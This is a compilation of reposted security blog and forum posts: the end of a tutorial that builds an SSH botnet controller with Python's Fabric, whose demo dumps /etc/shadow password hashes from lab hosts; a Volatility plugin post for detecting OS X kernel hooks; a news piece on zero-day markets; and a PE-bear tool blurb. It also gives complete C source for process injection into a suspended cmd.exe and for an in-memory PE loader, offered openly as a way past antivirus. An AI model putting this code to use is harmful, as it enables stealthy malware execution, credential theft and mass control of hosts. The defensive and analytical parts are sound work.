Let's see how we can use these commands. First, let's create a function that takes in a command string and executes the command using Fabric's "run" or "sudo" function as needed:

def run_command(command):
    try:
        with hide('running', 'stdout', 'stderr'):
            if command.strip()[0:5] == "sudo":
                results = sudo(command)
            else:
                results = run(command)
    except:
        results = 'Error'
    return results

Now, let's create a task that will use our run_command function to see which hosts are up and running. We will do this by executing the command uptime on the hosts.
def check_hosts():
    ''' Checks each host to see if it's running '''
    for host, result in execute(run_command, "uptime", hosts=env.hosts).iteritems():
        running_hosts[host] = result if result.succeeded else "Host Down"

For the other tasks, we will want to dynamically select which hosts we want to run a given command on, or establish a shell session to. We can do this by creating a menu, and then executing these tasks with a specific list of hosts using Fabric's execute function. Here's what this looks like:

def get_hosts():
    selected_hosts = []
    for host in raw_input("Hosts (eg: 0 1): ").split():
        selected_hosts.append(env.hosts[int(host)])
    return selected_hosts

def menu():
    for num, desc in enumerate(["List Hosts", "Run Command", "Open Shell", "Exit"]):
        print "[" + str(num) + "] " + desc
    choice = int(raw_input('\n' + PROMPT))
    while (choice != 3):
        list_hosts()
        # If we choose to run a command
        if choice == 1:
            cmd = raw_input("Command: ")
            # Execute the "run_command" task with the given command on the selected hosts
            for host, result in execute(run_command, cmd, hosts=get_hosts()).iteritems():
                print "[" + host + "]: " + cmd
                print ('-' * 80) + '\n' + result + '\n'
        # If we choose to open a shell
        elif choice == 2:
            host = int(raw_input("Host: "))
            execute(open_shell, host=env.hosts[host])
        for num, desc in enumerate(["List Hosts", "Run Command", "Open Shell", "Exit"]):
            print "[" + str(num) + "] " + desc
        choice = int(raw_input('\n' + PROMPT))

if __name__ == "__main__":
    fill_hosts()
    check_hosts()
    menu()

I should note that I left out a task to put a file onto the remote host, since this can be easily done from the command line (though a task for this could be made easily).
Let's see what our application looks like in action:

C:\>python fabfile.py
[root@192.168.56.101:22] Executing task 'run_command'
[root@192.168.56.102:22] Executing task 'run_command'

[0] List Hosts
[1] Run Command
[2] Open Shell
[3] Exit

fabric $ 1

ID | Host | Status
----------------------------------------
0 | root@192.168.56.101:22 | 07:27:14 up 10:40, 2 users, load average: 0.05, 0.03, 0.05
1 | root@192.168.56.102:22 | 07:27:12 up 10:39, 3 users, load average: 0.00, 0.01, 0.05

Command: sudo cat /etc/shadow
Hosts (eg: 0 1): 0 1
[root@192.168.56.101:22] Executing task 'run_command'
[root@192.168.56.102:22] Executing task 'run_command'

[root@192.168.56.101:22]: sudo cat /etc/shadow
--------------------------------------------------------------------------------
root:$6$jcs.3tzd$aIZHimcDCgr6rhXaaHKYtogVYgrTak8I/EwpUSKrf8cbSczJ3E7TBqqPJN2Xb.8UgKbKyuaqb78bJ8lTWVEP7/:15639:0:99999:7:::
daemon:x:15639:0:99999:7:::
bin:x:15639:0:99999:7:::
sys:x:15639:0:99999:7:::
sync:x:15639:0:99999:7:::
games:x:15639:0:99999:7:::
man:x:15639:0:99999:7:::
lp:x:15639:0:99999:7:::
<snip>

[root@192.168.56.102:22]: sudo cat /etc/shadow
--------------------------------------------------------------------------------
root:$6$27N90zvh$scsS8shKQKRgubPBFAcGcbIFlYlImYGQpGex.sd/g3UvbwQe5A/aW2sGvOsto09SQBzFF5ZjHuEJmV5GFr0Z0.:15779:0:99999:7:::
daemon:*:15775:0:99999:7:::
bin:*:15775:0:99999:7:::
sys:*:15775:0:99999:7:::
sync:*:15775:0:99999:7:::
games:*:15775:0:99999:7:::
man:*:15775:0:99999:7:::
<snip>

[0] List Hosts
[1] Run Command
[2] Open Shell
[3] Exit

fabric $ 2

ID | Host | Status
----------------------------------------
0 | root@192.168.56.101:22 | 07:27:14 up 10:40, 2 users, load average: 0.05, 0.03, 0.05
1 | root@192.168.56.102:22 | 07:27:12 up 10:39, 3 users, load average: 0.00, 0.01, 0.05

Host: 1
[root@192.168.56.102:22] Executing task 'open_shell'
Last login: Wed Jul 3 07:27:44 2013 from 192.168.56.1
root@kali:~# whoami
root
root@kali:~# exit
logout

[0] List Hosts
[1] Run Command
[2] Open Shell
[3] Exit

fabric $ 3

Great! It looks like we were able to successfully control all of the machines we had access to. It's important to note that there is so much more we can do with Fabric to help facilitate the host management. Here are just a few examples:

- By adding the @parallel decorator before our tasks, our tasks will run in parallel (Note: this won't work in Windows).
- Fabric also allows us to create groups (called roles). We could use these roles to create groups based on location, functionality, etc.
- Since our fabfile is just Python, we can extend it to use any functionality we want. For example, we could easily create a web interface to this using Flask or Django.

Conclusion

The goal of this post was to give a practical example showing how attackers could use high-quality network management products in ways they weren't intended to be used. It's important to note that this same functionality could extend to any other IT automation solution such as Chef, Puppet, or Ansible. As always, feel free to leave questions and comments below.

- Jordan

Posted by Jordan

Sursa: RaiderSec: Building an SSH Botnet C&C Using Python and Fabric
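To make the @parallel and roles ideas above concrete without installing Fabric itself, here is a library-free Python sketch of the same pattern: a role map (mirroring Fabric's env.roledefs) and a thread pool fanning a command runner out across the selected hosts. The host strings and the run_on_host stub are made up for illustration; a real version would open SSH sessions the way Fabric does.

```python
from concurrent.futures import ThreadPoolExecutor

# Hypothetical role map, mirroring Fabric's env.roledefs
roledefs = {
    "web": ["root@192.168.56.101:22", "root@192.168.56.102:22"],
    "db":  ["root@192.168.56.103:22"],
}

def run_on_host(host, command):
    # Stand-in for Fabric's run()/sudo(); a real version would SSH in
    return "[%s] ran: %s" % (host, command)

def execute_parallel(task, command, roles):
    # Rough analogue of @parallel + execute(): one worker per host
    hosts = [h for role in roles for h in roledefs[role]]
    with ThreadPoolExecutor(max_workers=len(hosts)) as pool:
        futures = {h: pool.submit(task, h, command) for h in hosts}
        return {h: f.result() for h, f in futures.items()}

results = execute_parallel(run_on_host, "uptime", roles=["web"])
for host, output in sorted(results.items()):
    print(output)
```

The design point is the same one the post makes: because a fabfile is just Python, fan-out, grouping, and result collection are ordinary code, not framework magic.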
-
Back to Defense: Finding Hooks in OS X with Volatility

Summary

In my previous post I discussed how to mess with the OS X syscall table through direct syscall table modification, syscall function inlining, and patching the syscall handler. As I promised, I'll be providing a plugin to find the mess! The code for the check_hooks plugin can be found at github, and it incorporates existing detections for the sake of completeness. So let's go through the scenarios discussed earlier.

Syscall Interception by Directly Modifying the Syscall Table

- Replacing a Syscall with Another Syscall

Detecting a duplicate syscall entry is straightforward: keep track of the syscalls as they are listed and see if a duplicate appears. The example I'll be using is discussed in my previous post, which was replacing the setuid function with the exit function:

[Figure: Duplicate syscall function detection]

- Replacing a Syscall with a DTrace Hook

This one is an easy catch as well. I just check the syscall name to see if it contains the word 'dtrace' to detect syscall and mach_trap DTrace hooks.

[Figure: DTrace syscall hooking detection]

- Replacing a Syscall with an External Function

For this case I'll be using a Rubilyn-infected memory sample provided by @osxreverser, which can be found here. This is not a new detection, but it's included for the sake of completeness. As a new feature of this detection, I've included the hook's destination kext in the output (check_hooks/findKextWithAddress function).
As pointed out in the Volatility Blog, this rootkit hooks three functions:

[Figure: Rubilyn hook detection]

Syscall Function Interception or Inlining

Currently it is not possible to detect an inlined syscall function with the Mac side of the Volatility Framework, because it only checks for direct modification of the syscall table. To be able to detect function inlining, I applied two techniques:

- Check the function's prologue for modification, which will be useful later as well
- Check the function's flow control

Looking at the syscall function prologues, it can be seen that they contain the following:

For x86:
PUSH EBP
MOV EBP, ESP

For x64:
PUSH RBP
MOV RBP, RSP

The volshell script I used to see this is below:

# get sysent addresses for exit and setuid
nsysent = obj.Object("int", offset = self.addrspace.profile.get_symbol("_nsysent"), vm = self.addrspace)
sysents = obj.Object(theType = "Array", offset = self.addrspace.profile.get_symbol("_sysent"), vm = self.addrspace, count = nsysent, targetType = "sysent")

for (i, sysent) in enumerate(sysents):
    tgt_addr = sysent.sy_call.v()
    print self.addrspace.profile.get_symbol_by_address("kernel", tgt_addr)
    buf = self.addrspace.read(tgt_addr, 4)
    for op in distorm3.Decompose(tgt_addr, buf, distorm3.Decode64Bits):
        print op

The check_hooks/isPrologInlined function checks to see if the prologue conforms with these known instructions. The check_hooks/isInlined function, on the other hand, looks for calls, jumps or push/ret instructions that end up outside the kernel address space.
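The prologue check described above boils down to a byte comparison against the known-good instruction sequence. Here is a simplified, standalone sketch of the idea — not the plugin's actual code, and it only knows the one common x64 prologue shown above (`push rbp; mov rbp, rsp` encodes as 55 48 89 E5):

```python
# Known-good x64 function prologue: push rbp; mov rbp, rsp
X64_PROLOGUE = b"\x55\x48\x89\xe5"

def prologue_looks_inlined(first_bytes):
    # Flag the function if its first instructions deviate from the
    # expected prologue (e.g. overwritten with a jmp to a hook)
    return not first_bytes.startswith(X64_PROLOGUE)

clean = b"\x55\x48\x89\xe5\x41\x57"   # untouched function
hooked = b"\xe9\x10\x20\x30\x40\x90"  # starts with a jmp rel32

print(prologue_looks_inlined(clean))   # False
print(prologue_looks_inlined(hooked))  # True
```

As the post notes later, this check only works where prologues are uniform; functions with nonstandard prologues need the flow-control check instead.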
If we use the check_hooks plugin on a memory sample with the inlined setuid syscall function that trampolines into the exit syscall function, we get the following:

[Figure: Inlined function (setuid) detection]

This example is interesting because it wouldn't be picked up by the isInlined function, since the hook is within the kernel address space, but luckily I'm checking for function prologue modification, which flagged it. Another example of syscall inline hooking is DTrace fbt hooking, which modifies the hooked function's prologue. The check_hooks plugin will detect the DTrace fbt probe that is monitoring the getdirentries64 syscall function as well:

[Figure: DTrace fbt probe detection]

Patched Syscall Handler or Shadow Syscall Table

The shadowing of the syscall table is a technique that hides the attacker's modifications to the syscall table by creating a copy of it to modify, keeping the original untouched, as discussed in my previous post. The detection implemented in the check_hooks/isSyscallShadowed function works as follows:

1) Check functions known to have references to the syscall table. In this case the functions are unix_syscall_return, unix_syscall64, unix_syscall.
2) Disassemble them to find the syscall table references.
3) Obtain the references in the function and compare to the address in the symbols table.
After running the attack code sample for the shadow syscall table attack, I ran the check_hooks plugin against the memory sample and received the following output, which included hits for the shadow syscall table:

[Figure: Shadow syscall table detection]

It looks like I have covered the detection of the examples in my previous post, but I'm not done!

Bonus! Scanning Functions in Kernel/Kext Symbol Tables

Now that I have the tools to detect function modifications, I decided to check on the functions in the rest of the kernel and kernel extensions. To be able to accomplish this task, I had to obtain the list of symbols per kernel or kext, since the Volatility Framework is currently not able to list kernel or kext symbols from a memory sample. I followed these steps in the check_hooks/getKextSymbols function:

1) Get the Mach-O header (e.g. mach_header_64) to get the start of segments.
2) Locate the __LINKEDIT segment to get the address for the list of symbols represented as nlist_64 structs, the symbols file size and offsets.
3) Locate the segment with the LC_SYMTAB command to get the symbols and strings offsets, which will be used to...
4) Calculate the location of the symbols in __LINKEDIT. Once we know the exact address, loop through the nlist structs to get the symbols.
5) Also find the number of the __TEXT segment's __text section, which will be used to filter out symbols. According to Apple's documentation the compiler places only executable code in this section.

The nlist structs have a member called n_sect, which stores the number of the section that the symbol's code lives in. This value, in conjunction with the __text section's number, helped in narrowing down the list of symbols to mostly function symbols. I say mostly because I have seen structures, such as _mh_execute_header, still listed.
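The nlist_64 walk behind getKextSymbols can be illustrated on a toy buffer. The 16-byte struct layout below (n_strx, n_type, n_sect, n_desc, n_value) follows the Mach-O headers; the two symbol entries are fabricated for the example, and the section filter mirrors the n_sect check described above:

```python
import struct

# Mach-O nlist_64: uint32 n_strx, uint8 n_type, uint8 n_sect,
#                  uint16 n_desc, uint64 n_value  (16 bytes total)
NLIST64 = struct.Struct("<IBBHQ")

def symbols_in_section(nlist_buf, wanted_sect):
    # Yield (string-table offset, address) for entries whose n_sect
    # matches the __TEXT,__text section number, as the plugin filters
    for off in range(0, len(nlist_buf), NLIST64.size):
        n_strx, n_type, n_sect, n_desc, n_value = NLIST64.unpack_from(nlist_buf, off)
        if n_sect == wanted_sect:
            yield n_strx, n_value

# Two fake entries: one in section 1 (__text), one in section 3
buf = NLIST64.pack(4, 0x0f, 1, 0, 0xffffff8000200000)
buf += NLIST64.pack(20, 0x0f, 3, 0, 0xffffff8000300000)

print(list(symbols_in_section(buf, 1)))
```

In the real plugin the n_strx values index into the string table found via LC_SYMTAB, which is how each filtered address gets its name.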
[Figure: Some test output for kernel symbols]

Next step is to use the addresses obtained from the filtered symbols table to check for hooks. Quick note: while syscall functions had identical function prologues, other functions in the symbols table, such as bcopy, have different ones. Therefore, using the isPrologInlined function produces false positives, which left me with using the isInlined function to detect hooks. My target for this case is an OS X 10.8.3 VM running Hydra, a kernel extension written by @osxreverser that intercepts a process's creation, suspends it, and communicates it to a userland daemon. Hydra inline hooks the function proc_resetregister in order to achieve its first goal. After compiling and loading the kext, I ran the check_hooks plugin with the -K option to only scan the kernel to see what's detected: As seen in the screenshot, the plugin detects the function proc_resetregister as inline hooked and shows that the destination of the hook is in the 'put.as.hydra' kext. The other plugin-specific option, -X, will scan all kexts' symbols, if available, for hooking.

Note: Most testing was performed on OS X 10.7.5 x64 and 10.8.3 x64. Feedback about outcomes on other OS X versions would be appreciated.

Conclusion

With the check_hooks plugin, it's now possible to detect hooked functions in the syscall table and kext symbols, as well as a shadow syscall table. While this is great, it doesn't end here. In my next post I'll be exploring OS X IDT hooks, so stay tuned!

Posted by siliconblade at 10:20 PM

Sursa: What's in your silicon?: Back to Defense: Finding Hooks in OS X with Volatility
-
[h=1]Governments are Big Buyers of Zero-Day Flaws[/h] 15 July 2013 [h=2]The extent and sophistication of the market for zero-day vulnerabilities is becoming better understood. It appears that governments – especially the US, UK, Israel, Russia, India and Brazil – are among the biggest customers.[/h] A new report in the New York Times describes the market for zero-day flaws. "On the tiny Mediterranean island of Malta, two Italian hackers have been searching for bugs... secret flaws in computer code that governments pay hundreds of thousands of dollars to learn about and exploit." The hackers in question run the company known as Revuln, and like France-based Vupen, it finds or acquires zero-day vulnerabilities that it can sell on to the highest bidder. Vupen charges its customers an annual subscription fee of $100,000 merely to see its catalog of flaws – and then charges extra for each vulnerability. At these prices, it is unsurprising that the buyer is usually a government agency. As Graham Cluley comments, "The truth is that the likes of Google and Microsoft are never likely to be able to pay as much for a security vulnerability as the US or Chinese intelligence agencies." Although Microsoft has recently introduced a maximum bug bounty of $150,000, it pales into insignificance in the face of the reputed $500,000 paid for an iOS bug. Revuln's work has long been known. The Q4 2012 ICS-CERT Monitor warned, "Malta-based security start-up firm ReVuln claims to be sitting on a stockpile of vulnerabilities in industrial control software, but prefers to sell the information to governments and other paying customers instead of disclosing it to the affected software vendors." ICS vulnerabilities are precisely those needed by states to protect their own or attack foreign critical infrastructures. Last week, Der Spiegel published details of an email interview between Jacob Appelbaum and Edward Snowden. 
Snowden confirmed that Stuxnet had been jointly developed by the US and Israel. There is no information on whether the zero-days in Stuxnet were discovered or bought, but nevertheless ACLU policy analyst Christopher Soghoian blames Stuxnet for the success of companies like Vupen and Revuln. The knowledge that military organizations are interested in and use zero-day flaws "showed the world what was possible," explains the Times. "It also became a catalyst for a cyberarms race." The military establishment, said Soghoian, “created Frankenstein by feeding the market.” The problem now is that no-one knows how big or scary this Frankenstein might become. Is there a danger, for example, that developers could be persuaded to build in backdoors that they can later sell? Jeremiah Grossman, Founder and CTO of WhiteHat Security, thinks this is a possibility. "As 0-days go for six to seven figures, imagine the temptation for rogue developers to surreptitiously implant bugs in the software supply chain," he commented. "It's hard enough to find vulnerabilities in source code when developers are not purposely trying to hide them." This is a problem that is not going away. "Vulnerability is a function of complexity, and as operating systems and source code continually trend to more complexity, so does the scope for vulnerabilities and exploits," said Adrian Culley, a consultant with Damballa (and a former Scotland Yard detective), to Infosecurity. "All code is dual use. The reality is there is now a free market; and to coin a trite cliche, the lid is off Pandora's box." Sursa: Infosecurity - Governments are Big Buyers of Zero-Day Flaws
-
[h=1]Self-deleting executable[/h] by [h=3]zwclose7[/h]

This is another example of PE injection. This program will create a suspended cmd.exe process, and then inject the executable image into the child process. A user-mode APC is then queued to the child process's primary thread. Finally, the thread is resumed and the injected code is executed. The injected code calls the DeleteFile function to delete the original executable file.

1) Get the PE header of the program using RtlImageNtHeader.
2) Create a suspended cmd.exe using the CreateProcess function.
3) Allocate executable memory in the child process.
4) Relocate the executable image, and then write it to the child process using the NtWriteVirtualMemory function.
5) Queue a user-mode APC to the child process's primary thread.
6) Resume the primary thread using the NtResumeThread function.
7) The primary thread executes the injected code.
8) The injected code calls the DeleteFile function to delete the original executable file.
9) The injected code calls the ExitProcess function to terminate the cmd.exe process.
#include <Windows.h>
#include <winternl.h>

#pragma comment(lib,"ntdll.lib")

EXTERN_C PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader(PVOID);
EXTERN_C NTSTATUS NTAPI NtWriteVirtualMemory(HANDLE,PVOID,PVOID,ULONG,PULONG);
EXTERN_C NTSTATUS NTAPI NtResumeThread(HANDLE,PULONG);
EXTERN_C NTSTATUS NTAPI NtTerminateProcess(HANDLE,NTSTATUS);

char szFileName[260];

/* Runs inside the child process: loop until the original file is deleted */
void WINAPI ThreadProc()
{
    while(1)
    {
        Sleep(1000);
        if(DeleteFile(szFileName))
        {
            break;
        }
    }
    ExitProcess(0);
}

int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR lpCmdLine,int nCmdShow)
{
    PIMAGE_NT_HEADERS pINH;
    PIMAGE_DATA_DIRECTORY pIDD;
    PIMAGE_BASE_RELOCATION pIBR;
    HMODULE hModule;
    PVOID image,mem,StartAddress;
    DWORD i,count,nSizeOfImage;
    DWORD_PTR delta,OldDelta;
    LPWORD list;
    PDWORD_PTR p;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    GetModuleFileName(NULL,szFileName,260);
    hModule=GetModuleHandle(NULL);
    pINH=RtlImageNtHeader(hModule);
    nSizeOfImage=pINH->OptionalHeader.SizeOfImage;

    memset(&si,0,sizeof(si));
    memset(&pi,0,sizeof(pi));

    /* Create the suspended host process */
    if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,FALSE,CREATE_SUSPENDED|CREATE_NO_WINDOW,NULL,NULL,&si,&pi))
    {
        return 1;
    }

    mem=VirtualAllocEx(pi.hProcess,NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    if(mem==NULL)
    {
        NtTerminateProcess(pi.hProcess,0);
        return 1;
    }

    /* Take a local copy of our own image and relocate it to the remote base */
    image=VirtualAlloc(NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    memcpy(image,hModule,nSizeOfImage);

    pIDD=&pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
    pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)image+pIDD->VirtualAddress);

    delta=(DWORD_PTR)((LPBYTE)mem-pINH->OptionalHeader.ImageBase);
    OldDelta=(DWORD_PTR)((LPBYTE)hModule-pINH->OptionalHeader.ImageBase);

    while(pIBR->VirtualAddress!=0)
    {
        if(pIBR->SizeOfBlock>=sizeof(IMAGE_BASE_RELOCATION))
        {
            count=(pIBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/sizeof(WORD);
            list=(LPWORD)((LPBYTE)pIBR+sizeof(IMAGE_BASE_RELOCATION));

            for(i=0;i<count;i++)
            {
                if(list[i]>0)
                {
                    p=(PDWORD_PTR)((LPBYTE)image+(pIBR->VirtualAddress+(0x0fff & list[i])));
                    *p-=OldDelta;
                    *p+=delta;
                }
            }
        }
        pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)pIBR+pIBR->SizeOfBlock);
    }

    if(!NT_SUCCESS(NtWriteVirtualMemory(pi.hProcess,mem,image,nSizeOfImage,NULL)))
    {
        NtTerminateProcess(pi.hProcess,0);
        return 1;
    }

    /* Queue ThreadProc (rebased into the remote image) as an APC */
    StartAddress=(PVOID)((LPBYTE)mem+((LPBYTE)ThreadProc-(LPBYTE)hModule));

    if(!QueueUserAPC((PAPCFUNC)StartAddress,pi.hThread,0))
    {
        NtTerminateProcess(pi.hProcess,0);
        return 1;
    }

    NtResumeThread(pi.hThread,NULL);
    NtClose(pi.hThread);
    NtClose(pi.hProcess);
    VirtualFree(image,0,MEM_RELEASE);
    return 0;
}

[h=4]Attached Files[/h] selfdel.zip 272.35K 6 downloads Sursa: Self-deleting executable - rohitab.com - Forums
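The base-relocation walk in WinMain above translates almost mechanically into Python, which can be handy for eyeballing a .reloc section offline. The sketch below parses a fabricated relocation block; the layout follows the PE format (an 8-byte IMAGE_BASE_RELOCATION header of VirtualAddress and SizeOfBlock, followed by 16-bit entries whose low 12 bits are the page offset and high 4 bits the relocation type):

```python
import struct

def parse_reloc_block(data):
    # IMAGE_BASE_RELOCATION: DWORD VirtualAddress, DWORD SizeOfBlock
    page_rva, size = struct.unpack_from("<II", data, 0)
    count = (size - 8) // 2
    fixups = []
    for i in range(count):
        entry, = struct.unpack_from("<H", data, 8 + 2 * i)
        rtype, offset = entry >> 12, entry & 0x0fff
        if rtype != 0:  # 0 = IMAGE_REL_BASED_ABSOLUTE padding, skipped
            fixups.append((rtype, page_rva + offset))
    return fixups

# Fabricated block: page RVA 0x1000, two HIGHLOW (type 3) fixups + one pad entry
block = struct.pack("<II3H", 0x1000, 8 + 6, (3 << 12) | 0x010, (3 << 12) | 0x2a8, 0)
print(parse_reloc_block(block))  # [(3, 4112), (3, 4776)]
```

Each returned RVA is a location where the loader (or the C code above) must add the delta between the actual and preferred base — exactly the `*p-=OldDelta; *p+=delta;` step.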
-
- 1
-
-
[h=1]Execute PE file on virtual memory[/h]by [h=3]shebaw[/h]Hi everyone. I've been reversing some malware like Ramnit and I noticed that they contain most of their code in embedded executable programs, and proceed to execute the embedded program as if it were part of the parent program. This is different from the process-forking method, since that creates a new process, while this one just calls into the embedded program as if it were one of its own functions (well, almost). So here is some code I came up with that does just that. What it basically does is: it first maps the executable's sections onto an executable memory region, then imports the required DLLs and builds the IAT of the executable, and finally performs relocation fix-ups and transfers control to the entry point of the executable, after setting up ebx to point to the PEB and eax to the EP. Since you can't always allocate at the preferred base address of the executable, a relocation table is a MUST. This won't work on executables without relocation tables, but that shouldn't matter if you are trying to obfuscate your own code, since you can tell the compiler to include relocation tables when you recompile it. You can use this method as another layer of protection from AVs.
#include <Windows.h>
#include <string.h>
#include <stdio.h>
#include <tchar.h>
#include "mem_map.h"

HMODULE load_dll(const char *dll_name)
{
	HMODULE module;

	module = GetModuleHandle(dll_name);
	if (!module)
		module = LoadLibrary(dll_name);
	return module;
}

void *get_proc_address(HMODULE module, const char *proc_name)
{
	char *modb = (char *)module;
	IMAGE_DOS_HEADER *dos_header = (IMAGE_DOS_HEADER *)modb;
	IMAGE_NT_HEADERS *nt_headers = (IMAGE_NT_HEADERS *)(modb + dos_header->e_lfanew);
	IMAGE_OPTIONAL_HEADER *opt_header = &nt_headers->OptionalHeader;
	IMAGE_DATA_DIRECTORY *exp_entry = (IMAGE_DATA_DIRECTORY *)
		(&opt_header->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
	IMAGE_EXPORT_DIRECTORY *exp_dir = (IMAGE_EXPORT_DIRECTORY *)(modb + exp_entry->VirtualAddress);
	void **func_table = (void **)(modb + exp_dir->AddressOfFunctions);
	WORD *ord_table = (WORD *)(modb + exp_dir->AddressOfNameOrdinals);
	char **name_table = (char **)(modb + exp_dir->AddressOfNames);
	void *address = NULL;
	DWORD i;

	/* is ordinal? */
	if (((DWORD)proc_name >> 16) == 0) {
		WORD ordinal = LOWORD(proc_name);
		DWORD ord_base = exp_dir->Base;

		/* is valid ordinal? */
		if (ordinal < ord_base || ordinal > ord_base + exp_dir->NumberOfFunctions)
			return NULL;

		/* taking ordinal base into consideration */
		address = (void *)(modb + (DWORD)func_table[ordinal - ord_base]);
	} else {
		/* import by name */
		for (i = 0; i < exp_dir->NumberOfNames; i++) {
			/* name table pointers are rvas */
			if (strcmp(proc_name, modb + (DWORD)name_table[i]) == 0)
				address = (void *)(modb + (DWORD)func_table[ord_table[i]]);
		}
	}
	/* is forwarded? */
	if ((char *)address >= (char *)exp_dir &&
	    (char *)address < (char *)exp_dir + exp_entry->Size) {
		char *dll_name, *func_name;
		HMODULE frwd_module;

		dll_name = strdup((char *)address);
		if (!dll_name)
			return NULL;
		address = NULL;

		func_name = strchr(dll_name, '.');
		*func_name++ = 0;

		if (frwd_module = load_dll(dll_name))
			address = get_proc_address(frwd_module, func_name);
		free(dll_name);
	}
	return address;
}

#define MAKE_ORDINAL(val) (val & 0xffff)

int load_imports(IMAGE_IMPORT_DESCRIPTOR *imp_desc, void *load_address)
{
	while (imp_desc->Name || imp_desc->TimeDateStamp) {
		IMAGE_THUNK_DATA *name_table, *address_table, *thunk;
		char *dll_name = (char *)load_address + imp_desc->Name;
		HMODULE module;

		module = load_dll(dll_name);
		if (!module) {
			printf("error loading %s\n", dll_name);
			return 0;
		}

		name_table = (IMAGE_THUNK_DATA *)((char *)load_address + imp_desc->OriginalFirstThunk);
		address_table = (IMAGE_THUNK_DATA *)((char *)load_address + imp_desc->FirstThunk);
		/* if there is no name table, use address table */
		thunk = (void *)name_table == load_address ? address_table : name_table;
		if ((void *)thunk == load_address)
			return 0;

		while (thunk->u1.AddressOfData) {
			unsigned char *func_name;

			/* is ordinal? */
			if (thunk->u1.Ordinal & IMAGE_ORDINAL_FLAG)
				func_name = (unsigned char *)MAKE_ORDINAL(thunk->u1.Ordinal);
			else
				func_name = ((IMAGE_IMPORT_BY_NAME *)((char *)load_address + thunk->u1.AddressOfData))->Name;
			/* address_table->u1.Function = (DWORD)GetProcAddress(module, (char *)func_name); */
			address_table->u1.Function = (DWORD)get_proc_address(module, (char *)func_name);
			thunk++;
			address_table++;
		}
		imp_desc++;
	}
	return 1;
}

void fix_relocations(IMAGE_BASE_RELOCATION *base_reloc, DWORD dir_size,
		     DWORD new_imgbase, DWORD old_imgbase)
{
	IMAGE_BASE_RELOCATION *cur_reloc = base_reloc, *reloc_end;
	DWORD delta = new_imgbase - old_imgbase;

	reloc_end = (IMAGE_BASE_RELOCATION *)((char *)base_reloc + dir_size);
	while (cur_reloc < reloc_end && cur_reloc->VirtualAddress) {
		int count = (cur_reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
		WORD *cur_entry = (WORD *)(cur_reloc + 1);
		void *page_va = (void *)((char *)new_imgbase + cur_reloc->VirtualAddress);

		while (count--) {
			/* is valid x86 relocation? */
			if (*cur_entry >> 12 == IMAGE_REL_BASED_HIGHLOW)
				*(DWORD *)((char *)page_va + (*cur_entry & 0x0fff)) += delta;
			cur_entry++;
		}
		/* advance to the next one */
		cur_reloc = (IMAGE_BASE_RELOCATION *)((char *)cur_reloc + cur_reloc->SizeOfBlock);
	}
}

IMAGE_NT_HEADERS *get_nthdrs(void *map)
{
	IMAGE_DOS_HEADER *dos_hdr;

	dos_hdr = (IMAGE_DOS_HEADER *)map;
	return (IMAGE_NT_HEADERS *)((char *)map + dos_hdr->e_lfanew);
}

/* returns EP mem address on success
 * NULL on failure
 */
void *load_pe(void *fmap)
{
	IMAGE_NT_HEADERS *nthdrs;
	IMAGE_DATA_DIRECTORY *reloc_entry, *imp_entry;
	void *vmap;
	WORD nsections, i;
	IMAGE_SECTION_HEADER *sec_hdr;
	size_t hdrs_size;
	IMAGE_BASE_RELOCATION *base_reloc;

	nthdrs = get_nthdrs(fmap);
	reloc_entry = &nthdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
	/* no reloc info? */
	if (!reloc_entry->VirtualAddress)
		return NULL;

	/* allocate executable mem (.SizeOfImage) */
	vmap = VirtualAlloc(NULL, nthdrs->OptionalHeader.SizeOfImage,
			    MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (!vmap)
		return NULL;

	/* copy the Image + Sec hdrs */
	nsections = nthdrs->FileHeader.NumberOfSections;
	sec_hdr = IMAGE_FIRST_SECTION(nthdrs);
	hdrs_size = (char *)(sec_hdr + nsections) - (char *)fmap;
	memcpy(vmap, fmap, hdrs_size);

	/* copy the sections */
	for (i = 0; i < nsections; i++) {
		size_t sec_size;

		sec_size = sec_hdr[i].SizeOfRawData;
		memcpy((char *)vmap + sec_hdr[i].VirtualAddress,
		       (char *)fmap + sec_hdr[i].PointerToRawData, sec_size);
	}

	/* load dlls */
	imp_entry = &nthdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
	if (!load_imports((IMAGE_IMPORT_DESCRIPTOR *)
			  ((char *)vmap + imp_entry->VirtualAddress), vmap))
		goto cleanup;

	/* fix relocations */
	base_reloc = (IMAGE_BASE_RELOCATION *)((char *)vmap + reloc_entry->VirtualAddress);
	fix_relocations(base_reloc, reloc_entry->Size, (DWORD)vmap,
			nthdrs->OptionalHeader.ImageBase);

	return (void *)((char *)vmap + nthdrs->OptionalHeader.AddressOfEntryPoint);
cleanup:
	VirtualFree(vmap, 0, MEM_RELEASE);
	return NULL;
}

int vmem_exec(void *fmap)
{
	void *ep;

	ep = load_pe(fmap);
	if (!ep)
		return 0;
	__asm {
		mov ebx, fs:[0x30]	; PEB pointer, as the real loader provides
		mov eax, ep
		call eax
	}
	return 1;
}

Sursa: Execute PE file on virtual memory - rohitab.com - Forums
-
[h=2]PE-bear[/h]

[h=2]What is it?[/h]
PE-bear is my new project. It’s a reversing tool for PE files.

[h=2]Download[/h]
The latest version is 0.1.5 (beta), released: 14.07.2013
changelog.txt changelog.pdf
Available here: PE-bear 0.1.5 32bit | PE-bear 0.1.5 64bit
*requires: Microsoft Visual C++ 2010 Redistributable Package, available here: Redist 32bit | Redist 64bit

[h=2]Features and details[/h]
- handles PE32 and PE64
- views multiple files in parallel
- recognizes known packers (by signatures)
- fast disassembler – starting from any chosen RVA/file offset
- visualization of the sections layout
- selective comparing of two chosen PE files
- integration with the Explorer menu
- and more…

